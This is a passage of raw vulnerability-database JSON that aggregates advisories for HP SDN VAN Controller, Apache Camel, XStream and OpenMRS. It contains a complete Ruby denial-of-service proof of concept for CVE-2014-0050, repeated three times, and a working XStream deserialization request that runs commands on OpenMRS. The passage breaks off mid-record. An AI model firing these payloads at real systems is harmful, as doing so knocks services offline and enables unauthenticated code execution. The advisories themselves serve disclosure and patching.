document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04657823\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04657823\r\nVersion: 1\r\n\r\nHPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS),\r\nDistributed Denial of Service (DDoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-05-11\r\nLast Updated: 2015-05-11\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), Distributed Denial\r\nof Service (DDoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP SDN VAN\r\nController. The vulnerabilities could be remotely exploited resulting in\r\nDenial of Service (DoS) or a Distributed Denial of Service (DDoS).\r\n\r\nReferences:\r\n\r\n CVE-2014-0050 Remote Denial of Service (DoS)\r\n\r\n CVE-2015-2122 Remote Distributed Denial of Service (DDoS)\r\n\r\n SSRT102049\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SDN VAN Controller version 2.5 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0050 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2122 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP recommends either of the two following workarounds for the vulnerabilities\r\nin the HP SDN VAN Controller.\r\n\r\n - The network for the server running the HP SDN VAN Controller management\r\nVLAN should be on a separate and isolated "management" VLAN.\r\n\r\n - Configure the firewall on the server running HP SDN VAN Controller so\r\nthat the only network traffic allowed to the REST port is from trusted\r\nservers on the network that need to use the REST layer. For example: the\r\nMicrosoft Lync Server for Optimizer.\r\n\r\n For more detailed information, please refer to the "Securing REST layer\r\nAccess on HP VAN SDN Controllers" article at the following location:\r\n\r\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=em\r\nr_na-c04676756\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlVQ3n0ACgkQ4B86/C0qfVleJgCg+qPCFTzdKRL5cLe4eNH7Q82V\r\nw80AoOpSvjMM19ssS++abLKV1S+kypwk\r\n=Wtwj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32033", "title": "[security bulletin] HPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS), Distributed Denial of Service (DDoS)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "No description provided", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14470", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14470", "title": "HP SDN VAN Controller DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T17:31:33", "description": "CVE(CAN) ID: CVE-2014-0002\r\n\r\nApache Camel\u662f\u57fa\u4e8e\u5df2\u77e5\u7684\u4f01\u4e1a\u7ea7\u96c6\u6210\u6a21\u5f0f\u4e0a\u7684\u5f00\u6e90\u96c6\u6210\u6846\u67b6\u3002\r\n\r\nApache Camel 2.11.0-2.11.3\u3001Apache Camel 2.12.0-2.12.2\u7248\u672c\u7684XSLT\u7ec4\u4ef6\u7528xslt\u4f8b\u7a0b\u8f6c\u6362XML\u6d88\u606f\u65f6\u4f1a\u89e3\u6790\u6d88\u606f\u5185\u7684\u5b9e\u4f53\uff0c\u53ef\u4ee5\u63d0\u4ea4\u6d88\u606f\u5230xslt\u4f8b\u7a0b\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u8bfb\u53d6\u53ef\u8bbf\u95ee\u7684\u8fd0\u884c\u4e2d\u5e94\u7528\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\uff0c\u4e5f\u53ef\u80fd\u6267\u884c\u5176\u4ed6\u66f4\u9ad8\u7ea7\u7684XXE\u653b\u51fb\u3002\r\n0\r\nApache Group Camel < 2.12.3\r\nApache Group Camel < 2.11.4\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\nApache Group\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08CVE-2014-0002\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nCVE-2014-0002\uff1aCVE-2014-0002: Apache Camel critical disclosure vulnerability\r\n\u94fe\u63a5\uff1ahttp://camel.apache.org/security-advisories.data/CVE-2014-0002.txt.asc", "published": "2014-03-05T00:00:00", "title": "Apache Camel XSLT XML\u5916\u90e8\u5b9e\u4f53\u6f0f\u6d1e(CVE-2014-0002)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0002"], "modified": "2014-03-05T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61642", "id": "SSV:61642", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:32:27", "description": "BUGTRAQ ID: 65902\r\nCVE(CAN) ID: CVE-2014-0003\r\n\r\nApache Camel\u662f\u57fa\u4e8e\u5df2\u77e5\u7684\u4f01\u4e1a\u7ea7\u96c6\u6210\u6a21\u5f0f\u4e0a\u7684\u5f00\u6e90\u96c6\u6210\u6846\u67b6\u3002\r\n\r\nApache Camel 2.11.0-2.11.3\u3001Apache Camel 2.12.0-2.12.2\u7248\u672c\u7684XSLT\u7ec4\u4ef6\u5141\u8bb8XSL\u6837\u5f0f\u8868\u8c03\u7528\u5916\u90e8Java\u65b9\u6cd5\u3002\u53ef\u4ee5\u5411xslt Camel\u4f8b\u7a0b\u63d0\u4ea4\u6d88\u606f\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\uff0c\u5229\u7528\u6b64\u6f0f\u6d1e\u53ef\u5728Camel\u670d\u52a1\u5668\u8fdb\u7a0b\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u8fdc\u7a0b\u4ee3\u7801\u3002\r\n0\r\nApache Group Camel < 2.12.3\r\nApache Group Camel < 2.11.4\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache Group\r\n------------\r\nApache Group\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08CVE-2014-0003\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nCVE-2014-0003\uff1aCVE-2014-0003: Apache Camel critical disclosure vulnerability\r\n\u94fe\u63a5\uff1ahttp://camel.apache.org/security-advisories.data/CVE-2014-0003.txt.asc", "published": "2014-03-04T00:00:00", "title": "Apache Camel\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(CVE-2014-0003)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0003"], "modified": "2014-03-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61629", "id": "SSV:61629", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T16:36:25", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial-of-Service", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-84935", "id": "SSV:84935", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\r\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\r\n# of assisting system administrators in evaluating whether their applications \t#\r\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\r\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\r\n#################################################################################\r\n\r\n\r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n\r\n\r\noptions = {}\r\n\r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n\r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n\r\n opt.on("-h","--help","help") do\r\n \tputs ""\r\n puts "#################################################################################"\r\n\tputs "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n\tputs "# #"\r\n\tputs "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n\tputs "# This is a Proof of Concept code that was created for the sole purpose #"\r\n\tputs "# of assisting system administrators in evaluating whether or not #"\r\n\tputs "# their applications are vulnerable to this issue. #"\r\n\tputs "# #"\r\n\tputs "# Please use responsibly. #"\r\n\tputs "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n\texit\r\n end\r\nend\r\n\r\nopt_parser.parse!\r\n\r\n\r\nuri = ""\r\nbegin\r\n\turi = URI.parse(options[:url])\r\nrescue Exception => e\r\n\tputs ""\r\n\tputs "ERROR: Invalid URL was entered #{options[:url]}"\r\n\tputs ""\r\n puts opt_parser\r\n exit\r\nend\r\n\r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n\tbegin\r\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\r\n\t\tthrow Exception.new if number_of_requests <= 0 \r\n\trescue Exception => e\r\n\t\tputs e\r\n\t\tputs ""\r\n\t\tputs "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n\t\tputs ""\r\n\t puts opt_parser\r\n\t exit\r\n\tend\r\nend\r\n\r\n#uri = URI.parse(uri)\r\n\r\n\r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n\r\n\r\nnumber_of_requests.times do \r\n\tbegin\r\n\tputs "Request Launched"\r\n\thttps = Net::HTTP.new(uri.host,uri.port)\r\n\thttps.use_ssl = uri.scheme=="https"\r\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n\treq = Net::HTTP::Post.new(uri.path)\r\n\treq.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n\treq.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n\treq.body = "b"*4097\r\n\thttps.read_timeout = 1 \r\n\tres = https.request(req)\r\n\trescue Timeout::Error=>e\r\n\t\tputs "Timeout - continuing DoS..."\r\n\trescue Exception=>e\r\n\t\tputs e.inspect\r\n\tend\r\nend\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-84935"}, {"lastseen": "2017-11-19T17:35:36", "description": "BUGTRAQ ID: 65400\r\nCVE(CAN) ID: CVE-2014-0050\r\n\r\nApache Commons FileUpload\u8f6f\u4ef6\u5305\u53ef\u4ee5\u5411\u5c0f\u670d\u52a1\u7a0b\u5e8f\u548cWeb\u5e94\u7528\u6dfb\u52a0\u9ad8\u6027\u80fd\u7684\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\u3002Apache Tomcat\u662f\u4e00\u4e2a\u6d41\u884c\u7684\u5f00\u653e\u6e90\u7801\u7684JSP\u5e94\u7528\u670d\u52a1\u5668\u7a0b\u5e8f\u3002\r\n\r\nApache\u5171\u4eab\u6587\u4ef6\u4e0a\u4f20\u5b58\u5728\u89e3\u6790\u7578\u5f62\u7684Content-Type\u5934\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f7f\u7528\u7279\u5236\u7684\u8bf7\u6c42\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u4f1a\u4f7f\u7a0b\u5e8f\u5d29\u6e83\u3002\n0\nCommons FileUpload 1.0-1.3\r\nApache Tomcat 8.0.0-RC1-8.0.1\r\nApache Tomcat 7.0.0-7.0.50\r\nApache Tomcat 6\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nApache\r\n-----\r\n\u5347\u7ea7\u5230Commons FileUpload 1.3.1, \u6216\u8005Tomcat 8.0.2, 7.0.51\u53ca\u66f4\u9ad8\u7248\u672c\u4fee\u590d\u6b64\u6f0f\u6d1e\uff1a\r\n\r\nhttp://commons.apache.org/", "published": "2014-02-13T00:00:00", "type": "seebug", "title": "Apache Commons FileUpload/Apache Tomcat\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61443", "id": "SSV:61443", "sourceData": "\n #################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. #\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = "Usage: ./CVE-2014-0050.rb [OPTIONS]"\r\n opt.separator ""\r\n opt.separator "Options"\r\n opt.on("-u","--url URL","The url of the Servlet/JSP to test for Denial of Service") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on("-n","--number_of_requests NUMBER_OF_REQUSETS","The number of requests to send to the server. The default value is 10") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on("-h","--help","help") do\r\n puts ""\r\n puts "#################################################################################"\r\n puts "# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #"\r\n puts "# #"\r\n puts "# Author: Oren Hafif, Trustwave SpiderLabs Research #"\r\n puts "# This is a Proof of Concept code that was created for the sole purpose #"\r\n puts "# of assisting system administrators in evaluating whether or not #"\r\n puts "# their applications are vulnerable to this issue. #"\r\n puts "# #"\r\n puts "# Please use responsibly. #"\r\n puts "#################################################################################"\r\n puts ""\r\n puts opt_parser\r\n puts ""\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = ""\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts ""\r\n puts "ERROR: Invalid URL was entered #{options[:url]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts ""\r\n puts "ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}"\r\n puts ""\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs ""\r\nputs "WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort..."\r\ni=10\r\ni.times { print "#{i.to_s}...";sleep 1; i-=1;}\r\nputs ""\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts "Request Launched"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme=="https"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field("Content-Type","multipart/form-data; boundary=#{"a"*4092}")\r\n req.add_field("lf-None-Match","59e532f501ac13174dd9c488f897ee75")\r\n req.body = "b"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts "Timeout - continuing DoS..."\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-61443", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:38", "description": "\nOpenMRS Reporting Module 0.9.7 - Remote Code Execution", "edition": 1, "published": "2016-01-07T00:00:00", "title": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "EXPLOITPACK:868FED2D5F6215B2F39518F65E3C1404", "href": "", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\nProduct: OpenMRS\nVendor: OpenMRS Inc.\nTested versions: See summary\nStatus: Fixed by vendor\nReported by: Brian D. Hysell\n\nProduct description:\n\nOpenMRS is \"the world's leading open source enterprise electronic\nmedical record system platform.\"\n\nVulnerability summary:\n\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\nversion of the XStream library vulnerable to CVE-2013-7285, making it\nvulnerable to remote code execution. If the Appointment Scheduling UI\nModule 1.0.3 is also installed, this RCE is accessible to\nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\ninstalled were confirmed to be vulnerable; other versions and\nconfigurations containing these modules are likely to be vulnerable as\nwell (see \"Remediation\").\n\nDetails:\n\nIn the Reporting module, the method saveSerializedDefinition (mapped\nto module/reporting/definition/saveSerializedDefinition) in\nInvalidSerializedDefinitionController can be accessed by an\nunauthenticated user.\n\nThe attacker must provide a valid UUID for a definition present in\nOpenMRS or a NullPointerException will be thrown before the remote\ncode execution can take place. However, upon initialization the\nAppointments Scheduling UI module inserts a definition with a constant\nUUID hard-coded into AppointmentSchedulingUIConstants\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\n\nProof of concept:\n\nGET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=<dynamic-proxy><interface>org.openmrs.OpenmrsObject</interface><handler%20class%3d\"java.beans.EventHandler\"><target%20class%3d\"java.lang.ProcessBuilder\"><command><string>calc.exe</string></command></target><action>start</action></handler></dynamic-proxy>&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject\n\nRemediation:\n\nThe vendor has addressed this issue in OpenMRS Standalone 2.3.1,\nOpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,\n1.10.3, and 1.9.10.\n\nTimeline:\n\nVendor contacted: November 2, 2015\nVendor replied: November 3\nCVE requested: November 14 (no response)\nPatch released: December 2\nAnnounced: January 6, 2016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:03", "description": "\nApache Commons FileUpload and Apache Tomcat - Denial of Service", "edition": 1, "published": "2014-02-12T00:00:00", "title": "Apache Commons FileUpload and Apache Tomcat - Denial of Service", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "EXPLOITPACK:EB000848EE6583FA3B8F33FA4CDD34C0", "href": "", "sourceData": "#################################################################################\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Author: Oren Hafif, Trustwave SpiderLabs Research\t\t\t\t\t\t\t\t#\n# This is a Proof of Concept code that was created for the sole purpose \t\t#\n# of assisting system administrators in evaluating whether their applications \t#\n# are vulnerable to this issue or not\t\t\t\t\t\t\t\t\t\t\t#\n# \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n# Please use responsibly.\t\t\t\t\t\t\t\t\t\t\t\t\t\t#\n#################################################################################\n\n\nrequire 'net/http'\nrequire 'net/https'\nrequire 'optparse'\nrequire 'openssl'\n\n\noptions = {}\n\nopt_parser = OptionParser.new do |opt|\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\n opt.separator \"\"\n opt.separator \"Options\"\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\n options[:url] = url\n end\n\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\n options[:number_of_requests] = number_of_requests\n end\n\n opt.on(\"-h\",\"--help\",\"help\") do\n \tputs \"\"\n puts \"#################################################################################\"\n\tputs \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\n\tputs \"# #\"\n\tputs \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\n\tputs \"# This is a Proof of Concept code that was created for the sole purpose #\"\n\tputs \"# of assisting system administrators in evaluating whether or not #\"\n\tputs \"# their applications are vulnerable to this issue. #\"\n\tputs \"# #\"\n\tputs \"# Please use responsibly. #\"\n\tputs \"#################################################################################\"\n puts \"\"\n puts opt_parser\n puts \"\"\n \n\texit\n end\nend\n\nopt_parser.parse!\n\n\nuri = \"\"\nbegin\n\turi = URI.parse(options[:url])\nrescue Exception => e\n\tputs \"\"\n\tputs \"ERROR: Invalid URL was entered #{options[:url]}\"\n\tputs \"\"\n puts opt_parser\n exit\nend\n\nnumber_of_requests = 10;\nif(options[:number_of_requests] != nil)\n\tbegin\n\t\tnumber_of_requests = Integer( options[:number_of_requests] )\n\t\tthrow Exception.new if number_of_requests <= 0 \n\trescue Exception => e\n\t\tputs e\n\t\tputs \"\"\n\t\tputs \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\n\t\tputs \"\"\n\t puts opt_parser\n\t exit\n\tend\nend\n\n#uri = URI.parse(uri)\n\n\nputs \"\"\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\ni=10\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\nputs \"\"\n\n\nnumber_of_requests.times do \n\tbegin\n\tputs \"Request Launched\"\n\thttps = Net::HTTP.new(uri.host,uri.port)\n\thttps.use_ssl = uri.scheme==\"https\"\n\thttps.verify_mode = OpenSSL::SSL::VERIFY_NONE\n\treq = Net::HTTP::Post.new(uri.path)\n\treq.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\n\treq.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\n\treq.body = \"b\"*4097\n\thttps.read_timeout = 1 \n\tres = https.request(req)\n\trescue Timeout::Error=>e\n\t\tputs \"Timeout - continuing DoS...\"\n\trescue Exception=>e\n\t\tputs e.inspect\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-12-13T09:58:27", "bulletinFamily": "unix", "cvelist": ["CVE-2013-7285"], "edition": 1, "description": "### Background\n\nXStream is a simple library to serialize objects to XML and back again.\n\n### Description\n\nIt was found that XStream would deserialize arbitrary user-supplied XML content, thus representing objects of any type. \n\n### Impact\n\nA remote attacker could pass a specially crafted XML document to XStream, possibly resulting in the execution of arbitrary code with the privileges of the process or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll XStream users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-java/xstream-1.4.8-r1\"", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "href": "https://security.gentoo.org/glsa/201612-35", "id": "GLSA-201612-35", "title": "XStream: Remote execution of arbitrary code", "type": "gentoo", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:UNKNOWN/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-04-06T03:36:33", "description": "Exploit for java platform in category web applications", "edition": 2, "published": "2016-01-07T00:00:00", "type": "zdt", "title": "OpenMRS Reporting Module 0.9.7 - Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-7285"], "modified": "2016-01-07T00:00:00", "id": "1337DAY-ID-24847", "href": "https://0day.today/exploit/description/24847", "sourceData": "Title: Unauthenticated remote code execution in OpenMRS\r\nProduct: OpenMRS\r\nVendor: OpenMRS Inc.\r\nTested versions: See summary\r\nStatus: Fixed by vendor\r\nReported by: Brian D. Hysell\r\n \r\nProduct description:\r\n \r\nOpenMRS is \"the world's leading open source enterprise electronic\r\nmedical record system platform.\"\r\n \r\nVulnerability summary:\r\n \r\nThe OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a\r\nversion of the XStream library vulnerable to CVE-2013-7285, making it\r\nvulnerable to remote code execution. If the Appointment Scheduling UI\r\nModule 1.0.3 is also installed, this RCE is accessible to\r\nunauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform\r\n1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3\r\ninstalled were confirmed to be vulnerable; other versions and\r\nconfigurations containing these modules are likely to be vulnerable as\r\nwell (see \"Remediation\").\r\n \r\nDetails:\r\n \r\nIn the Reporting module, the method saveSerializedDefinition (mapped\r\nto module/reporting/definition/saveSerializedDefinition) in\r\nInvalidSerializedDefinitionController can be accessed by an\r\nunauthenticated user.\r\n \r\nThe attacker must provide a valid UUID for a definition present in\r\nOpenMRS or a NullPointerException will be thrown before the remote\r\ncode execution can take place. However, upon initialization the\r\nAppointments Scheduling UI module inserts a definition with a constant\r\nUUID hard-coded into AppointmentSchedulingUIConstants\r\n(c1bf0730-e69e-11e3-ac10-0800200c9a66).\r\n \r\nProof of concept:\r\n \r\nGET 